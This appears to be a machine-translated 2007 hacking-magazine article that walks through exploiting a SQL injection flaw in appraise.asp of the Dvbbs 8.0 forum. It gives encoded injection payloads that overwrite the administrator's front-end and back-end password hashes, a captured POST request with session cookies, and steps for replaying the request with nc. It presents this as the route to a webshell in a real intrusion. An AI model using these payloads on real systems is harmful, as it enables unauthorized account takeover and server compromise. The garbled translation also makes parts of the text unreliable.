8.0 most "new" remote injection vulnerabilities in the Web

Topic: Dynamic Network 8.0 The latest remote injection bug is coming.
Author: hackest [H.S.T]

This article has been published in the "Hacker X-Files" 9th issue of the magazine, reproduced please indicate the source.

The words move the net since 8.0 version pushes out, on very few again high risk loophole, tired I wait for vegetable vegetable to face move net 8.0 and helpless. Fortunately, in the eyes of God, I finally burst out a very serious remote injection vulnerability, but only limited to the SQL version to be effective, access version of the unaffected. The problem file is appraise.asp, which allows you to change the administrator password directly, but it may be inconvenient for the operation. In order to test the exploit, I set up a dynamic network 8.0 SQL version of the forum in this machine. After the test environment is ready to test the vulnerability, known Administrator username (Admin) and password (admin888). First sign up for a user name and password are hackest ordinary users, and then login forum, and then casually find a topic post. After sending the post, click "Click to participate in comment" in the return post browsing page, as shown in Figure 1.

Go to the comments page, as shown in Figure 2.

Then open the Grab kit Winsock expert ready to grab the bag, as shown in Figure 3.
Then in the comments page casually fill out some content, verify code do not fill in the wrong line, and then click on "Comment" submitted comments, prompt success, click OK to return to the grab bag tool found has caught the information we need, as shown in Figure 4.
[Imgwidth=400 height=300]http://photo11.yupoo.com/20070921/095654_1572458555_qldmbxtn.jpg[/img]
Then the intercepted data contains the contents of the Post field (that is, the entire contents of the box with ID 1), and all copies are saved to a text file named Test.txt. The next operation may be a bit complicated, because we need to construct this packet and then submit it with NC. We need to construct the injection statement first, such as to change the administrator user's foreground login password so that it can be constructed:
%3bdeclare+@a+sysname+select
+@a%3d0x6500650065003000310063003900610062003700320036003700660032003500
+update+dv%5fuser+set+userpassword%3d@a+where+userid%3d1
The prototype of this code is:
;d eclare @a sysname Select @a=0x6500650065003000310063003900610062003700320036003700660032003500
Update Dv_user set userpassword=@a where userid=1
The general meaning of this statement is to change the user password field UserPassword in the Dv_user table userid=1 to Hackest (where the The 0x6500650065003000310063003900610062003700320036003700660032003500 is transformed by encrypting the character hackest into a 16 MD5 hash eee01c9ab7267f25 , then convert eee01c9ab7267f25 to sql_en characters using the conversion tool, as shown in Figure 5, figure 6.


The reason for this deformation is to bypass the 8.0 filter, if you find it difficult to understand can be seen more than a few times and then hands-on practice can be understood. The transformed injected statement that we have constructed:% 3bdeclare+@a+sysname+select+@a%3d0x650065006500300031006300390061006200
3700320036003700660032003500 +update+dv%5fuser+set+userpassword%3d@a+where+userid%3d1 inserted into Test.txt's last line of TopicID =1 later, and then calculate the number of packets added characters (the original packet length of 90, now increase the number of characters is 152, add up is 242), so the content-length after 90 to 242 and then save. Here to note that the operation must be careful, because if the wrong packet length, with NC submission will not succeed. Before performing the NC commit operation, let's take a look at the admin userpassword Field 469e80d32c0559f8 in the Dv_user table, as shown in Figure 7.

The next step is to use NC to submit the packet, put Nc.exe and test.txt in the same directory (I am here in the C-packing directory), and then perform NC 127.0.0.1, as shown in Figure 8.
If you see such a return message, you have successfully changed the front-desk login password for admin admin without an accident. Since I am the test environment set up by this machine, it is very convenient to view the changes of the data. Go to see success first, obviously already succeeded. The UserPassword has been converted from the original admin888 's 16-bit MD5 (469E80D32C0559F8) to Hackest's 16-bit MD5 (EEE01C9AB7267F25), as shown in Figure 9.

The vulnerability test succeeded, but in the actual intrusion, we also need to change the administrator's background login password to enter the background to get Webshell. But the operation just changed the administrator's front login password, we can construct the following packets to change the administrator's background login password:
%3bdeclare+@a+sysname+select
+@a%3d0x6500650065003000310063003900610062003700320036003700660032003500
+update+dv%5fadmin+set+password%3d@a+where+id%3d1
The prototype is:
;d eclare @a sysname Select @a=0x6500650065003000310063003900610062003700320036003700660032003500
Update dv_admin set password=@a where id=1
That is, the statement is changed, and is also inserted into the test.txt of the last line of topicid=1 and then saved. Then the NC commits, and the information similar to Figure 8 is returned. Submit we found admin's background login password has been successfully changed, as shown in Figure 10.

Use the new password to successfully log in to the background, as shown in Figure 11.
[Imgwidth=400 height=300]http://photo11.yupoo.com/20070921/095922_1039127146_xajmtahy.jpg[/img]
The manual test of the loophole is over, perhaps the vegetables are too troublesome, there is no relevant use of tools. The answer is yes, cows have already written the use of tools, the interface as shown in Figure 12.

To fill in the relevant information also need to grab bag acquisition, including URL, Boardid, TopicID, Announceid, authentication Code (ACODESTR), cookies, and so on, grabbed the operation has been mentioned before. The contents of the bag are similar to the following data:
Post/appraise.asp?action=save http/1.1
Accept:image/gif, Image/x-xbitmap, Image/jpeg, Image/pjpeg, Application/msword, Application/x-shockwave-flash, */*
Referer:http://127.0.0.1/dispbbs.asp?boardid=1&id=1&page=1
Accept-language:zh-cn
content-type:application/x-www-form-urlencoded
Ua-cpu:x86
Accept-encoding:gzip, deflate
user-agent:mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; Tencenttraveler. NET CLR 1.1.4322)
host:127.0.0.1
Content-length:90
Connection:keep-alive
Cache-control:no-cache
cookie:w0802=2; rtime=1; ltime=1187503483390; W08_EID=57689537-HTTP%3A//127.0.0.1/INDEX.ASP%3FBOARDID%3D1; dvforum=userid=2&usercookies=0&statuserid=4086140&userclass=
%d0%c2%ca%d6%c9%cf%c2%b7&username=hackest&password=v0qdt2f765u6x7j5&userhidden=2; GETURL=%2FPOST%5FUPLOAD%2EASP%3FBOARDID%3D1; Aspsessionidsssrrqbq=bjndbjndboijfngjpdacboek; upnum=0; Dvbbs=baffbdfhbe; aspsessionidqqqrsraq=einnncodghhiafnhdpmkmned; Aspsessionidqsqrtraq=cohbeoodefpdcnkkbpapkcmf
boardid=1&topicid=1&announceid=1&atype=0&a1=0&a2=0&atitle=test&acodestr=8598& Acontent=test

The contents of the reference can fill in the required data, fill in the SQL injection column fill in the;d eclare @a sysname Select @a= 0x3400360039006500380030006400330032006300300035003500390066003800
Update dv_admin set password=@a where id=1 (this is to change the password to admin888), and then click the next "Code" small button (that is, complete the transformation process) and then submit, as shown in Figure 13.

You will find that the admin's background login password is also changed to admin888, as shown in Figure 14.
At this point, the test process for this vulnerability is over, and the operation may be a bit more complicated. As for the backstage how to take Webshell, we please refer to the last period of "dynamic Network 8.0 background Webshell" The article introduced the method.